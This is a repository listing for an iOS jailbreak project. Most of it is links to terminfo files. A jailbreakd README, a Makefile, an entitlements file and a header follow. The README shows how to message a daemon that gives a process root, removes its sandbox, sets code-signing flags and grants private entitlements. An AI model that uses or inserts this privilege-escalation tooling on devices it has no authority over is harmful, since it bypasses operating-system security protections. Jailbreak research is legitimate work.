--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi-mini
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi-mono:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi-mono
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi-mr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi-mr
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi-mtabs:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi-mtabs
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi-nt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi-nt
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi.sys:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi.sys
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi.sys-old:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi.sys-old
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi.sysk:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi.sysk
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi43m:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi43m
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi77:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi77
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi80x25:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi80x25
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi80x25-mono:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi80x25-mono
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi80x25-raw:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi80x25-raw
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi80x30:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi80x30
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi80x30-mono:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi80x30-mono
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi80x43:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi80x43
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi80x43-mono:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi80x43-mono
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi80x50:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi80x50
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi80x50-mono:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi80x50-mono
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi80x60:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi80x60
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansi80x60-mono:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansi80x60-mono
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansil:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansil
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansil-mono:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansil-mono
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansis:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansis
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansis-mono:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansis-mono
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansisysk:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansisysk
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/61/ansiw:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/61/ansiw
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/6c/linux:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/6c/linux
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/6c/linux-basic:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/6c/linux-basic
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/6c/linux-c:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/6c/linux-c
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/6c/linux-c-nc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/6c/linux-c-nc
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/6c/linux-koi8:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/6c/linux-koi8
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/6c/linux-koi8r:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/6c/linux-koi8r
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/6c/linux-lat:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/6c/linux-lat
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/6c/linux-m:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/6c/linux-m
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/6c/linux-nic:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/6c/linux-nic
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/6c/linux-vt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/6c/linux-vt
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/6c/linux2.6.26:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/6c/linux2.6.26
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/73/screen:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/73/screen
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/73/screen+fkeys:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/73/screen+fkeys
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/73/screen-16color:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/73/screen-16color
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/73/screen-16color-bce:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/73/screen-16color-bce
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/73/screen-16color-bce-s:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/73/screen-16color-bce-s
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/73/screen-16color-s:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/73/screen-16color-s
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/73/screen-256color:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/73/screen-256color
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/73/screen-256color-bce:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/73/screen-256color-bce
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/73/screen-256color-bce-s:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/73/screen-256color-bce-s
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/73/screen-256color-s:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/73/screen-256color-s
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/73/screen-bce:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/73/screen-bce
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/73/screen-s:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/73/screen-s
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/73/screen-w:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/73/screen-w
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/73/screen.linux:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/73/screen.linux
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/73/screen.mlterm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/73/screen.mlterm
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/73/screen.rxvt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/73/screen.rxvt
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/73/screen.teraterm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/73/screen.teraterm
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/73/screen.xterm-new:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/73/screen.xterm-new
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/73/screen.xterm-r6:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/73/screen.xterm-r6
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/73/screen.xterm-xfree86:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/73/screen.xterm-xfree86
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/73/screen2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/73/screen2
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/73/screen3:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/73/screen3
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100+:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100+
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100+enq:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100+enq
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100+fnkeys:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100+fnkeys
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100+keypad:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100+keypad
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100+pfkeys:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100+pfkeys
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-am:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-am
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-bm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-bm
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-bm-o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-bm-o
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-bot-s:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-bot-s
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-nam:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-nam
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-nam-w:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-nam-w
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-nav:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-nav
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-nav-w:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-nav-w
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-putty:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-putty
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-s:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-s
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-s-bot:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-s-bot
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-s-top:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-s-top
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-top-s:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-top-s
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-vb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-vb
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-w:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-w
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-w-am:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-w-am
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-w-nam:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-w-nam
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-w-nav:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100-w-nav
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/76/vt100nam:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/76/vt100nam
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/usr/share/terminfo/78/xterm-256color:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/usr/share/terminfo/78/xterm-256color
--------------------------------------------------------------------------------
/multi_path/jailbreakd/Makefile:
--------------------------------------------------------------------------------
1 | include $(THEOS)/makefiles/common.mk
2 |
3 | ARCHS = arm64
4 |
5 | TOOL_NAME = jailbreakd
6 | jailbreakd_FILES = $(wildcard *.m) $(wildcard *.c)
7 | CFLAGS += -Wno-everything
8 | jailbreakd_PRIVATE_FRAMEWORKS = IOKit AppSupport
9 | include $(THEOS_MAKE_PATH)/tool.mk
10 |
--------------------------------------------------------------------------------
/multi_path/jailbreakd/README.md:
--------------------------------------------------------------------------------
1 | # rootless jailbreakd
2 |
3 | A small jailbreakd offering some more functionality to the jailbreak. Uses CPDisctributedMessageCenter. To compile you need theos (why? cus why not? and I like theos. If you're smart enough you can still compile it manually very easily so yeah)
4 |
5 | # Setup
6 |
7 | - Grab AppSupport headers and add them into your include path (https://github.com/theos/headers/tree/05405174749d912f7726121fcb5f27de73af0f08/AppSupport)
8 | - Include "AppSupport/CPDistributedMessagingCenter.h" on your main.m file
9 | - Link with https://github.com/jakeajames/rootme-tutorial/blob/master/AppSupport.tbd
10 | - The general syntax follows as this:
11 | ```
12 | CPDistributedMessagingCenter *messageCenter = [CPDistributedMessagingCenter centerNamed:@"com.jakeashacks.rootme"];
13 | [messageCenter sendMessageAndReceiveReplyName:@"MESSAGE_NAME" userInfo:[NSDictionary dictionaryWithObject:[NSString stringWithFormat:@"%d", getpid()] forKey:@"pid"]];
14 | ```
15 | # Compiling
16 | ./make.sh
17 | # Commands
18 |
19 | At the moment these commands are available
20 |
21 | - "rootme": does setuid(0) and setgid(0) for you
22 | - "unsandbox": gets rid of most of the sandbox (This will not be any useful right now since to call jailbreakd you have to be unsandboxed already)
23 | - "platformize": marks your binary as platform by setting TF_PLATFORM and CS_PLATFORM_BINARY
24 | - "setcsflags": Sets some flags such as CS_PLATFORM_BINARY, CS_GET_TASK_ALLOW, CS_DEBUGGED etc
25 | - "entitle": Set entitlement to true or false. Example:
26 | ```
27 | CPDistributedMessagingCenter *messageCenter = [CPDistributedMessagingCenter centerNamed:@"com.jakeashacks.rootme"];
28 | NSMutableDictionary *dict = [NSMutableDictionary dictionary];
29 | [dict setValue:@"com.apple.private.skip-library.validation" forKey:@"ent"]; //entitlement name
30 | [dict setValue:@"true" forKey:@"value"]; //true or false
31 | [dict setValue:[NSString stringWithFormat:@"%d", getpid()] forKey:@"pid"];
32 | [messageCenter sendMessageAndReceiveReplyName:@"entitle" userInfo:dict];
33 | ```
34 |
35 | # Do binaries need suid permissions or root ownership?
36 |
37 | No. I didn't bother with that because a) There isn't a package manager so all binaries are controlled by you, b) there's no root remount thus nothing can cause a big mess, c) you need to be unsandboxed to make a call to jailbreakd (all binaries you run via SSH satisfy this requirement) and that's enough for me. Is it coming? Probably yes
38 |
39 | # Coming soon
40 |
41 | - I guess a nice response from jailbreakd telling us what happened in the other world
42 | - (?) check for suid permissions and ownership
43 |
--------------------------------------------------------------------------------
/multi_path/jailbreakd/ent.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | platform-application
6 |
7 | get-task-allow
8 |
9 | com.apple.system-task-ports
10 |
11 | task_for_pid-allow
12 |
13 | com.apple.private.memorystatus
14 |
15 | com.apple.private.security.container-required
16 |
17 |
18 |
19 |
20 |
--------------------------------------------------------------------------------
/multi_path/jailbreakd/jailbreakd:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/jailbreakd/jailbreakd
--------------------------------------------------------------------------------
/multi_path/jailbreakd/jelbrek.h:
--------------------------------------------------------------------------------
1 |
2 | void init_jelbrek(mach_port_t tfp0, uint64_t kernel_base);
3 | BOOL unsandbox(pid_t pid);
4 | void setcsflags(pid_t pid);
5 | BOOL get_root(pid_t pid);
6 | void platformize(pid_t pid);
7 | void entitlePid(pid_t pid, const char *ent1, BOOL val1);
8 |
